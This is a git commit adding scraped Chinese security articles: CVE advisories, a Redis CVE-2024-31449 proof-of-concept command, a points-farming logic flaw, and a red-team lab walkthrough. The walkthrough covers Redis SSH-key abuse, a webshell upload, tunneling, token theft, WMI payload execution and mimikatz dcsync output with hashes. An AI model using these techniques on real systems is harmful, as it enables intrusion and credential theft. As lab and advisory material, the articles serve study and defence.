简单逻辑漏洞学习、【漏洞预警】Apache OFBiz远程代码执行漏洞CVE-2024-47208、【漏洞预警】Apache HertzBeat < 1.6.1 消息通知模版注入漏洞CVE-2024-41151、Palo Alto Networks确认0Day漏洞正在被黑客利用、fastjson < 1.2.66 正则表达式拒绝服务漏洞REDOS、红日靶场(七)WHOAMI Penetration(一)、Redis CVE-2024-31449:如何重现和缓解漏洞、远程代码执行风险威胁用户安全,Zoom紧急修复多个安全漏洞;颠覆传统安全架构,Zscaler创新发布新型零信任分段方案 | 牛览、

This commit is contained in:
test 2024-11-18 16:13:48 +00:00
parent 9a5a4ae4e2
commit 36c4785e50
9 changed files with 2140 additions and 48 deletions

View File

@ -140,5 +140,13 @@
"https://mp.weixin.qq.com/s?__biz=MjM5MTAwNzUzNQ==&mid=2650510921&idx=1&sn=e4934351ec2c8cb6dbc0aeca15104b40": "倒计时2天“智效融合安全护航”·深圳站 第七期「度安讲」 技术沙龙开放报名",
"https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247492528&idx=2&sn=12ed7293c2d58a8ff8af2eee52151e30": "【poc】Fortinet FortiManager 中0day CVE-2024-47575 的 PoC 发布",
"https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247492528&idx=3&sn=ca32f8d2a6f6e69a0d8f6cb1c3cc86ed": "【poc】TP-Link 中的 DHCP 漏洞可让攻击者远程接管路由器 - PoC 发布",
"https://mp.weixin.qq.com/s?__biz=MzU3ODM2NTg2Mg==&mid=2247495506&idx=2&sn=4f47a0a0b8cf7c2347c48af444867c9c": "上周关注度较高的产品安全漏洞(20241111-20241117)"
"https://mp.weixin.qq.com/s?__biz=MzU3ODM2NTg2Mg==&mid=2247495506&idx=2&sn=4f47a0a0b8cf7c2347c48af444867c9c": "上周关注度较高的产品安全漏洞(20241111-20241117)",
"https://mp.weixin.qq.com/s?__biz=Mzg4MzU3MTcwNg==&mid=2247486025&idx=1&sn=57b3564d52b3979909e7c4ce558cb424": "简单逻辑漏洞学习",
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489173&idx=1&sn=38cddcc7195393081437dda1b20e81f5": "【漏洞预警】Apache OFBiz远程代码执行漏洞CVE-2024-47208",
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489173&idx=2&sn=8b54bc7f5eac3e68aa9c1b50d0bfe0f0": "【漏洞预警】Apache HertzBeat < 1.6.1 消息通知模版注入漏洞CVE-2024-41151",
"https://mp.weixin.qq.com/s?__biz=MzI5NTM4OTQ5Mg==&mid=2247632327&idx=4&sn=48bfb50af682460d968c919e508846b6": "Palo Alto Networks确认0Day漏洞正在被黑客利用",
"https://mp.weixin.qq.com/s?__biz=Mzg4MDY1MzUzNw==&mid=2247497926&idx=1&sn=26eb4132f92f9aed012a93735a6b3879": "fastjson < 1.2.66 正则表达式拒绝服务漏洞REDOS",
"https://mp.weixin.qq.com/s?__biz=MzkxNTc1MzQyNw==&mid=2247488223&idx=1&sn=179f23ace36083dd36a1f5052b4c6018": "红日靶场WHOAMI Penetration",
"https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247524352&idx=2&sn=840f79721a30962446402beb9e179f45": "Redis CVE-2024-31449如何重现和缓解漏洞",
"https://mp.weixin.qq.com/s?__biz=MzAxNTYwOTU1Mw==&mid=2650092449&idx=1&sn=ccafc6e2e300c5176b01f01455f66820": "远程代码执行风险威胁用户安全Zoom紧急修复多个安全漏洞颠覆传统安全架构Zscaler创新发布新型零信任分段方案 | 牛览"
}

View File

@ -1,17 +1,11 @@
# Palo Alto Networks确认0Day漏洞正在被黑客利用
老布 FreeBuf 2024-11-18 11:12
FreeBuf 商密君 2024-11-18 13:40
![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
近日全球网络巨头Palo Alto Networks确认旗下0Day漏洞正在被黑客利用。11月8日Palo Alto Networks发布了一份安全通告警告客户PAN-OS管理界面中存在一个远程代码执行漏洞并建议客户确保PAN-OS管理界面访问的安全性。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39tmyyDlVsmZoccz4K8eSN6RPRgib1aj9AdQYhvDeoDlBUnia4k5gJX8icJUxKnH8wfaDny2tFiad8yuw/640?wx_fmt=jpeg&from=appmsg "")
近日全球网络巨头Palo Alto Networks确认旗下0Day漏洞正在被黑客利用。11月8日Palo Alto Networks发布了一份安全通告
警告客户PAN-OS管理界面中存在一个远程代码执行漏洞并建议客户确保PAN-OS管理界面访问的安全性。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39tmyyDlVsmZoccz4K8eSN6cHfohWMRZSkY8icEo6XAJ7QsGaGC2Dnia3076fNUJm4F5h7ibvq0ls6lw/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39tmyyDlVsmZoccz4K8eSN6cHfohWMRZSkY8icEo6XAJ7QsGaGC2Dnia3076fNUJm4F5h7ibvq0ls6lw/640?wx_fmt=jpeg&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
但随着该漏洞的曝光Palo Alto Networks在11月15日发现已经有黑客/威胁组织正在利用该漏洞,对用户发起网络攻击,主要目标用户是那些暴露在互联网上防火墙管理界面。
@ -49,55 +43,35 @@ Palo Alto Network表示利用该漏洞实施零日攻击的攻击者实施了
在攻击的第一阶段,攻击者向 GlobalProtect 发送精心制作的 shell 命令而非有效的会话 ID导致在系统上创建一个空文件文件名由攻击者命名为嵌入式命令在第二阶段定时运行系统作业会在命令中使用攻击者提供的文件名进而让攻击者提供的命令能以更高的权限执行。利用这种方式攻击者就能将该漏洞武器化且不需要在设备上启用遥测功能就能对其进行渗透。
FreeBuf粉丝交流群招新啦
编辑:陈十九
在这里,拓宽网安边界
审核:商密君
甲方安全建设干货;
**征文启事**
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复「加群」,申请加入群聊
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
大家好,为了更好地促进同业间学术交流,商密君现开启征文活动,只要你对商用密码、网络安全、数据加密等有自己的独到见解和想法,都可以积极向商密君投稿,商密君一定将您的声音传递给更多的人。
![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXNcXmbiaiaCljdXpwzOEQ9QTBXMibM6rZTOnbTSwTmCXncQLria2vuLGxn8QPtznzBc0as8vBxWIjrWxQ/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
> https://www.securityweek.com/palo-alto-networks-confirms-new-firewall-zero-day-exploitation/
来源FreeBuf
>
>
>
>
>
>
>
>
>
>
>
>
>
>
注:内容均来源于互联网,版权归作者所有,如有侵权,请联系告知,我们将尽快处理。
![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXOdeQx0thlyozF2swQTEN9iaaBNDG0jTKfAgqgdesve8x5IEWNvYxjF6sAWjO1TPCZVsWd0oiaDn3uw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMyyClGk1cttkSBbJicAn5drpXEbFIeChG9IkrslYEylRF4Z6KNaxNafDwr5ibcYaZXdnveQCNIr5kw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "")
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaMcJkA69QYZ9T4jmc3fdN6EA7Qq9A8E3RWcTKhxVEU1QjqOgrJMu2Qg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect)
点分享
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaiaRXdw4BFsc7MxzkVZaKGgtjWA5GKtUfm3hlgzsBtjJ0mnh9QibeFOGQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")
点点赞
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaeiaNlRO9954g4VS87icD7KQdxzokTGDIjmCJA563IwfStoFzPUaliauXg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
点在看

View File

@ -0,0 +1,86 @@
# Redis CVE-2024-31449如何重现和缓解漏洞
Ots安全 2024-11-18 09:50
![](https://mmbiz.qpic.cn/mmbiz_gif/bL2iaicTYdZn7gtxSFZlfuCW6AdQib8Q1onbR0U2h9icP1eRO6wH0AcyJmqZ7USD0uOYncCYIH7ZEE8IicAOPxyb9IA/640?wx_fmt=gif "")
2024 年 10 月 7 日Redis 中一个严重漏洞编号为CVE-2024-31449的信息被公开。该漏洞允许经过身份验证的用户使用特制的 Lua 脚本执行远程代码,对使用 Redis 的系统的安全构成重大威胁。
**CVE-2024-31449 是什么?**
Redis 自带 Lua 解释器支持执行用户脚本。CVE-2024-31449 漏洞与bit.tohexLua 库中的函数有关。攻击者可使用特制的 Lua 脚本触发库中的堆栈缓冲区溢出bit从而可能导致 Redis 服务器上执行任意代码。
需要注意的是,利用此漏洞执行的任何命令都将在拥有 Redis 进程的用户和组下运行。这可以为攻击者提供相当高级别的系统访问权限。
**如何重现漏洞PoC**
为了演示此漏洞,您可以使用特制的 Lua 脚本bit.tohex使用特定参数调用该函数。此类脚本的一个示例是通过以下方式执行命令redis-cli
```
redis-cli eval "return bit.tohex(65535, -2147483648)" 0
```
**重现步骤:**
1. 使用redis-cli或其他支持执行 Lua 脚本的客户端连接到您的 Redis 服务器。
1. bit.tohex执行调用具有大值或负值的函数的Lua脚本
```
redis-cli eval "return bit.tohex(65535, -2147483648)" 0
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48tacokBQiaFx7stjVT737b0fQUZzPzia0YFNYkRNf58iagI2GpGJ44vr613NnqXLpLgZOpYnyrAcU50hDw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48tacokBQiaFx7stjVT737b0fQUgeYfke3YOaemBHjr0c2mz9W6n8Jict81skefN8lATia10DdTk5RYGm2w/640?wx_fmt=png&from=appmsg "")
3.
观察服务器行为。成功利用此漏洞后,服务器可能会:
- 返回不正确的结果或错误。
- 使 Redis 服务器崩溃。
- 可能执行任意代码。
重要提示:此示例仅用于教育目的,不应在生产环境中使用。执行此脚本可能会导致 Redis 服务器不稳定或受到损害。
**谁有风险?**
所有版本的 Redis 社区版 (CE)、Redis 开源版 (OSS) 和 Redis Stack 都容易受到此漏洞的影响。如果您的 Redis 实例可供经过身份验证的用户访问,尤其是当对 Lua 脚本的访问不受限制时,您就会面临风险。
**4.将 Redis 更新到最新版本**
- 对于 Redis OSS/CE/Stack更新到以下版本
- OSS/CE7.4.1、7.2.6 或 6.2.16
- 堆栈7.4.0-v1、7.2.0-v13 或 6.2.6-v17
- 对于 Redis Enterprise软件更新到以下版本
- 7.4.2-169 及以上
- 7.2.4-109 及以上
- 6.4.2-110 及以上
感谢您抽出
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycNnFvFYVgXoExRy0gqCkqvrAghf8KPXnwQaYq77HMsjcVka7kPcBDQw/640?wx_fmt=gif "")
.
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycd5KMTutPwNWA97H5MPISWXLTXp0ibK5LXCBAXX388gY0ibXhWOxoEKBA/640?wx_fmt=gif "")
.
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycU99fZEhvngeeAhFOvhTibttSplYbBpeeLZGgZt41El4icmrBibojkvLNw/640?wx_fmt=gif "")
来阅读本文
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWge7Mibiad1tV0iaF8zSD5gzicbxDmfZCEL7vuOevN97CwUoUM5MLeKWibWlibSMwbpJ28lVg1yj1rQflyQ/640?wx_fmt=gif "")
**点它,分享点赞在看都在这里**

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,21 @@
# 【漏洞预警】Apache HertzBeat < 1.6.1 消息通知模版注入漏洞CVE-2024-41151
cexlife 飓风网络安全 2024-11-18 14:03
![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu038ZktCibwtKS9kYs2yGzk8t0n8rsKCdsZpF2c6ZjqwhVpr3KPeOuVdUOvdJs2lvFicOb9cc7DCZvRA/640?wx_fmt=png&from=appmsg "")
**漏洞描述:**
Apache HertzBeat是开源的实时监控工具,支持自定义监控消息通知模板,在受影响版本中,由于针对消息通知模板的内容存在未限制的反序列化逻辑,具有系统登录权限的攻击者可以利用该漏洞执行任意代码。
**影响范围:**hertzbeat 生态:linux
仓库类型unmanaged受影响的版本[1.4.2, 1.6.1]最小修复版本1.6.1
**修复建议:**
建议用户的升级版本1.6.1,修复了该问题。
https://hertzbeat.apache.org/

View File

@ -0,0 +1,11 @@
# 【漏洞预警】Apache OFBiz远程代码执行漏洞CVE-2024-47208
cexlife 飓风网络安全 2024-11-18 14:03
![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu038ZktCibwtKS9kYs2yGzk8tfYbAPUScCH0VLyq776b68PVCElSKKcLxic9EC0icWdzmYwQCjpEsdSGg/640?wx_fmt=png&from=appmsg "")
**漏洞描述:**
ApacheOFBiz是一个著名的电子商务平台,提供了创建基于最新J2EE/ XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架,Apache OFBiz中修复了一个远程代码执行漏洞CVE-2024-47208,Apache OFBiz 18.12.17 之前版本中存在远程代码执行漏洞,由于对URL校验不严格,攻击者可通过构造恶意URL绕过校验逻辑并注入Groovy 表达式代码或触发服务器端请求伪造SSRF攻击,导致远程代码执行或访问未授权资源,此外Apache OFBiz 18.12.17之前版本中还存在另一个远程代码执行漏洞CVE-2024-48962,由于在处理URL参数时未正确对特殊字符进行转义和编码,攻击者可以构造恶意URL参数绕过SameSite cookie限制,通过目标重定向和服务器端模板注入SSTI实现跨站请求伪造CSRF攻击,进而触发远程代码执行。
**影响范围:**Apache OFBiz < 18.12.17**修复建议:**升级版本目前这些漏洞已经修复,受影响用户可升级到以下版本Apache OFBiz >= 18.12.17**下载链接:**https://ofbiz.apache.org/download.html**临时措施:**暂无**参考链接:**https://lists.apache.org/thread/ls1w4ywdobn4hok1tpfm1x23n0q59o74

View File

@ -0,0 +1,50 @@
# 简单逻辑漏洞学习
青春计协 青春计协 2024-11-18 15:03
GRADUATION
**点击蓝字 关注我们**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/MVPvEL7Qg0Gz8nMFbAuAFty9awwJb4ibP3ahLT1ATibpeOyECdaOzIxibbgojtibTE6vAlEwYAW6Ajp3OdicibMRjgJg/640?wx_fmt=png "")
免责申明:
      本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。
漏洞复现:
**正常流程:**
活动报名——扣除1000积分身份校验
错误:
取消报名——增加1000积分未进行身份校验
复现:
通过取消报名可以达到越权的效果有个uid=数字的账户信息标识,但是可以通过遍历来进行测试他人的用户,只要一直发送取消报名的包就可以。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/P0DiaOtaPBdqZSXFF0l82ibj4xnBMgmhExaj5PsqHQsbNsPT2iaM0XkN0v6bGgLIsUiaSDgR9ATHIl21iboAcWL4e6Q/640?wx_fmt=png "")
备注:由于时间问题今天简单学个小逻辑,明天发昨天讨论的漏洞问题。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/P0DiaOtaPBdqyqHGhMytHibYkJzLy7jCuSPKSytpkQ6te6mZ50ZuIZMHHoRgxic9Dia0GPyMbLaZw8PJKUKQ3YjufQ/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/P0DiaOtaPBdoibdfnVoh7edkWom8f7KHrIgicFXA0XIlICibiajfh0aHmIG93A96b3LTHdhGyFdSfIpJ2Ta6gfiaJjwg/640?wx_fmt=jpeg "")
**编辑|青春计协**
**审核|青春计协**

View File

@ -0,0 +1,278 @@
# 红日靶场WHOAMI Penetration
原创 Undefin3d团队 Undefin3d安全团队 2024-11-18 12:45
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51SZKvIeb0p3BrdwlM4ianxlufV2uvDecP3MDjNoZdibriaespbe93HC3Jw/640?wx_fmt=png "")
·
DMZ IP段为192.168.1.0/24
·
二层网络 IP段为192.168.52.0/24
·
三层网络 IP段为192.168.93.0/24
## 第一层网络  
首先我们拿到靶机的ip为192.168.1.128我们直接可以fscan进行端口扫描发现了一个redis授权漏洞和一个Laravel的cve漏洞
   
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51Y3AgVjRibppZnM4ibJsB8ic3V0Gde0QBERftM8AYhS37Fhlj1z05f0kTA/640?wx_fmt=png "")
我们直接通过redis未授权写ssh密钥拿到主机的shell
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51ASowlNBAybgSiaMIs5nANzFOqAvd97Tbfw14Vz6dUt3FmnFKFWBGOXg/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51TtLBrUib9qENqljstRMAibar80KLP4HlkibmZt8bMcRoKyzrc2YeicMFXw/640?wx_fmt=png "")
   
然后我们直接viper上新建监听然后一句话上线viper
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51BWtkIiaQqcS5hfp7U3hmZicmZdJYDDWecSOr4THxIA8wdH8Bu7ODDjKg/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51SN0d8kMPcMZzYfvL7AZSrBNTAJnvTP7NIfeZJIJjNW9qRqC4s9OIUA/640?wx_fmt=png "")
直接在靶机上运行就可以上线viper
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51kE8yKo1quHKPNyqrrnWclj25RG72CLx5ATfxHtzMHICsIU7JSOSp5g/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j512PHXXicbEdFL5NcKRxhNtAxrRsOHrLujQXcVB9bIDt56o3icgC0hQzVQ/640?wx_fmt=png "")
## 第二层网络  
然后我们添加内网路由查看主机的ip
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j514kkUia053RF3wDMSLBNic6uNwb7NTKmyXU8a4UCxNOu57eamQ5KMN64A/640?wx_fmt=png "")
发现存在内网192.168.52.0/24段的网络我们上次fscan进行内网扫描发现了一个通达oa
   
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51xlG1rSmBqHKib5rkNb5zbNBdczMJj7IKeBQg3KsydenWDtb6th7rAag/640?wx_fmt=png "")
我们先将通达的端口给转发到本地,然后进行访问
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51VRYFiaNA0qdfvwIRVaXhnQrmcjyvkXBaSFPZzEt0x98wRicQibc1cwVCQ/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51xfhd3JzRpqqJPRfHf0SK3icQibIQ25CxFlWHSbUpiaGewicnXgUNybTCVQ/640?wx_fmt=png "")
我们使用通达oa的工具进行测试发现一个文件上传的漏洞我们直接传入🐎上线蚁剑
   
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51VHV4VT7cfwib23f3icxkmV0Z6R8oUCibsmFMTOib7qk0EXWibuT4gqshN8A/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j5115C9VuOiaAR2IpSGWgeeMwVvx5icfJ2s38EpwSicq2UXMwS3mszL5eM7A/640?wx_fmt=png "")
   
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51jV5XNJhdsSnVVcHQMMMQ8tPXwz75j9ItoLnhgDnnRVdsnwNlD0kJgw/640?wx_fmt=png "")
然后我们通过蚁剑上传我们viper的🐎就可以上线了
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51SHhDbm6mKCcFViapBsNknT7hktk0KIOqy7SbFy1O8OgUVVW4VezFibWg/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51usapmPU6ibG5NI9rwTA2N1rRK9OZdcrFrrbAiaQgzmPyTUiaRCD2Q1Yuw/640?wx_fmt=png "")
   
然后添加路由但是我们发现上传的fscan没法运行然后又是一台windows的系统我们直接转cs上线但是cs上线需要把我们的本地的端口转发到靶机里面这样我们就可以监听到pc了我们frp进行内网穿透我们将第一台靶机设为我们的服务端本地为客户端这样就可以了
第一台靶机
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51R7YmaRE2JG8v2WGFichx4B1Ujpmv7tc1aMjDVnSa6oMOf60maj645vQ/640?wx_fmt=png "")
本地kali
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51Mqzodh9Orfeia9iaEpHm0n3NcJHGsfYSK8Qve6gK33ibY9zZoia6icKY9PQ/640?wx_fmt=png "")
发现可以连通
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51Z0g4Vx1mu1226q9WTKOAeYE7OxLJVRgfmIb6CMh7lAWF1bbI5P3eAw/640?wx_fmt=png "")
   
我们可以进行测试在本机监听8008端口然后在靶机上去访问nc 127.0.0.1 8008发现可以了
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j519dMGiclJYahqEJaUz8XDVibL0icQhtWaOaSgjM23gVdc5eIQmbChbofEg/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j519dMGiclJYahqEJaUz8XDVibL0icQhtWaOaSgjM23gVdc5eIQmbChbofEg/640?wx_fmt=png "")
然后我们就可以开启cs的去监听8008端口viper直接已将转cs就可以上线cs了
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51DmFibicXqqCoF6Gic5n5Xqk3tBImg4ukCOuyYc2g2jWwb6dBjjTtTRQIg/640?wx_fmt=png "")
   
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j5171to1HoXs0Cad9FGP4ByicHZrTh14vjL6uR1WphAxfWzM0mbUCOyibuw/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51T4EcEnSQM5Iw8lCRIvW8C9SmMicmHmGygflzicbicRtaRV0UPqzpfBawA/640?wx_fmt=png "")
## 第三层网络  
上线cs后我们进行端口的扫描我们发现93段的ip我们直接进行探测然后发现DC的ip是192.168.93.30和pc2的ip
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51A1Dm7icKa1SIXVwMPfniaPUrEzAEZvNicmP1icYwpuSiarMSicDTic1RVQDqw/640?wx_fmt=png "")
然后通过 shell ipconfig /displaydns 来查看域名
   
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51Y1Xu9Um2jriahc1oeDA0l4vHbh6qQG9ZcE1U7A8hznzicI3vpQiafgFoA/640?wx_fmt=png "")
然后我们查看进程,会发现有域管的进程,我们可以进行令牌的窃取
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51ibDhWW32ecXMGVHmqJ0hnOicL7HaNeDD3JhOA0gEicssJVulRgkjuJkPw/640?wx_fmt=png "")
   
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51IVZGhFFU9rF3b3RoaDHgY89ZPkpEj3hO7y3vUbDiblcnYZQB5VwPvKg/640?wx_fmt=png "")
然后我们进行通过域管的权限去运行我们的🐎就可以上线域管的监听了
remote-exec wmi 192.168.52.30 C:\MYOA\webroot\sh3.exe
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j51Q7G5uZ0PUxibxQws1ndoTLqSIcicBIX56QQVICmnlialjBhySPjXjH9dA/640?wx_fmt=png "")
然后我们尝试导出域内所有用户的hash值发现可以导出然后我们就可以用DCsync攻击就可以
[*] Tasked beacon to run mimikatz's lsadump::dcsync /domain:WHOAMIANONY.org /all /csv command            [+] host called home, sent: 787057 bytes            [+] received output:            [DC] 'WHOAMIANONY.org' will be the domain            [DC] 'DC.whoamianony.org' will be the DC server            [DC] Exporting domain 'WHOAMIANONY.org'            [rpc] Service
  : ldap            [rpc] AuthnSvc : GSS_NEGOTIATE (9)            502
    krbtgt
    6be58bfcc0a164af2408d1d3bd313c2a
    514            1001
    whoami
    ab89b1295e69d353dd7614c7a3a80cec
    66048            1115
    moretz
    ba6723567ac2ca8993b098224ac27d90
    66048            1002
    DC$
    202d13c79f52cc1d49870638e854afad
    532480            1112
    bunny
    cc567d5556030b7356ee4915ff098c8f
    66048            500
    Administrator
    ab89b1295e69d353dd7614c7a3a80cec
    66048            1113
    PC2$
    65e034039585f728c8f15fe3f3b814ed
    4096            
   
然后我们进行上🐎直接上线dc同样操作上线pc2
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j510sclryHkLnIElOck6gS4P3ZW8DCmuxFCE2UGetMVoIQrS1o50uibpqg/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icHDOcTg0ZHJaF6TTIoCbX51wdjnP0j519g9PZESROFGfxhWGR3ziaZIpwV1M7RaSF6GicicZpzalKnef4piceicmzaA/640?wx_fmt=png "")
   

View File

@ -0,0 +1,218 @@
# 远程代码执行风险威胁用户安全Zoom紧急修复多个安全漏洞颠覆传统安全架构Zscaler创新发布新型零信任分段方案 | 牛览
安信安全 安信安全 2024-11-18 09:00
